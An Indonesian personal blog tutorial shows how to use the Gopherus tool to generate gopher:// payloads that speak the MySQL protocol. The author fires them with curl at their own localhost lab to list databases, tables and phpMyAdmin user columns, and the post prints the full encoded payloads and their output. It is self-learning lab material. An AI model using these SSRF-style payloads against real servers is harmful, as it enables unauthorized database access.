No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation

Blog Archive



Seal

Always Trust Yourself And Use Your Opportunity



Selasa, 28 Mei 2019

Parrot Linux : Exploitasi MySQL Dengan Gopherus


oke gaes kembali lagi dengan gw Yukinoshita 47 kali ini gw mau share experimen unfaedah gw yaitu Exploitasi MySQL Dengan Gopherus ya lebih tepat nya di localhost wkwkwkkw gw disini coba exploitasi MySQL aja karena tumbal yang memadai saat ini hanya mysql :v

karena pas gw googling di forum heker ada gw nemu gopherus gopherusan cuma gajelas info nya wkwkwkk makanya gw coba-coba sendiri aja dulu.

menurut yg gw pelajari ini exploitasi menggunakan metode Gopher protocol 

Gopher adalah protokol layer aplikasi TCP/IP yang dirancang untuk distribusi, pencarian, dan pengambilan dokumen melalui Internet. Sangat berorientasi pada desain dokumen menu, protokol Gopher disajikan menarik untuk alternatif World Wide Web pada tahap awalnya, tetapi akhirnya gagal mencapai popularitas.  

Protokol ini menawarkan beberapa fitur yang tidak didukung oleh native Web dan menerapkan hierarki yang lebih kuat pada informasi yang tersimpan di dalamnya. Menu teks antarmuka yang mudah digunakan, dan cocok untuk lingkungan komputasi yang sangat bergantung pada remot teks berorientasi terminal komputer, yang masih umum pada saat pembentukannya pada tahun 1991, dan kesederhanaan protokol yang difasilitasi berbagai implementasi klien. Revisi gopher yang lebih baru dan klien grafis menambahkan dukungan untuk multimedia.

Dengan struktur hierarki, Gopher memberikan platform berguna untuk skala besar koneksi perpustakaan elektronik pertama. Pengguna Gopher ingat bahwa sistem "lebih cepat dan lebih efisien dan jauh lebih terorganisir" dari layanan Web saat ini. Meskipun sebagian besar digantikan oleh Web pada tahun berikutnya, protokol Gopher masih digunakan oleh penggemar, dan server populasi kecil tetap aktif dipertahankan.

oke langsung aja masuk sebagai root dulu gaes dengan perintah

sudo su

kemudian tekan enter lalu input password seperti biasa nya dan tekan enter


biase karena tools pihak ketiga gw berada di /opt/pentest jadi gw masuk ke direktori dulu dengan perintah

cd /opt/pentest

kemudian tekan enter jika lu ikuti tutor ini dan belum ada folder pentest di opt ya buat aja dulu dengan perintah mkdir /opt/pentest kemudian tekan enter


pertama download tools nya dengan perintah

git clone https://github.com/tarunkant/Gopherus

kemudian tekan enter dan tunggu hingga selesai


masuk ke direktori nya dengan perintah

cd Gopherus

kemudian tekan enter


install gopherus dengan perintah

./install.sh

kemudian tekan enter


gimana cara jalanin tools nya bisa langsung dengan perintah gopherus diterminal atau di dalam direktori Gopherus nya bisa juga lu jalanin dengan perintah python gopherus.py



untuk lihat informasi tools gopherus ini perintah nya

python gopherus.py -h

kemudian tekan enter



disini gw mau contohin exploitasi Mysql untuk lihat database, tabel, dan kolom nya aja ya wkwkwk

pertama buat dulu payload nya dengan perintah

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : show databases;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher


oke langsung aja coba eksekusi pake curl dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%10%03%73%68%6f%77%20%64%61%74%61%62%61%73%65%73%3b%01%01 --output gopher.log

kemudian tekan enter


liat hasil nya dengan perintah

cat gopher.log

kemudian tekan enter dan hasil nya emang berantakan gini kntl gw juga bingung ini karena belajar otodidak wkwkwkwkwk

disini gw bisa liat database nya adalah

dvwa
information_schema
mysql
performance_schema
phpmyadmin   


biase buat lagi dah payload buat liat tabel nya disini gw mau intip isi tabel dari database phpmyadmin

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : use phpmyadmin; show tables;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher seperti tadi


lanjut mari kita eksekusi payload nya dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%03%75%73%65%20%70%68%70%6d%79%61%64%6d%69%6e%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%01 --output gopher1.log 

kemudian tekan enter


mari kita intip output nya dengan perintah

cat gopher1.log 

kemudian tekan enter dan hasil nya jg amburadul bngst tp gw bisa baca output nya hasil nya adalah

pma__bookmark
pma__central_columns
pma__column_inf
pma__designer_settings   
pma__export_templates
pma__favorite
pma__history
pma__pdf_pagesa__navigationhiding
pma__trackingpma__userconfig
pma__usergroupsoords
pma__table_info
pma__table_uiprefs
pma__users



lanjut gw mau intip pma__users ya biase bikin lagi payload nya dengan perintah

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : use phpmyadmin; describe pma__users;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher lagi wkwkwkwk.



seperti biasa eksekusi dong payload nya dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%25%03%75%73%65%20%70%68%70%6d%79%61%64%6d%69%6e%3b%20%64%65%73%63%72%69%62%65%20%70%6d%61%5f%5f%75%73%65%72%73%3b%01%01 --output gopher2.log

kemudian tekan enter


oke mari intip output nya kali ini juga berantakan wkwkwkwk tp gw bisa baca kok isi nya dari tabel pma__users dengan perintah

cat gopher2.log

username
usergroup


intinya pada bagian Give query to execute adalah perintah MariaDB atau MySQL aja gw cuma bisa contohin sampai disini aja nanti kalo gw dapet metode lain gopherus ini ya gw buatin kok artikel nya wkwkwkwk

oke cukup sampai disini aja sekian dan terimaksih



Share: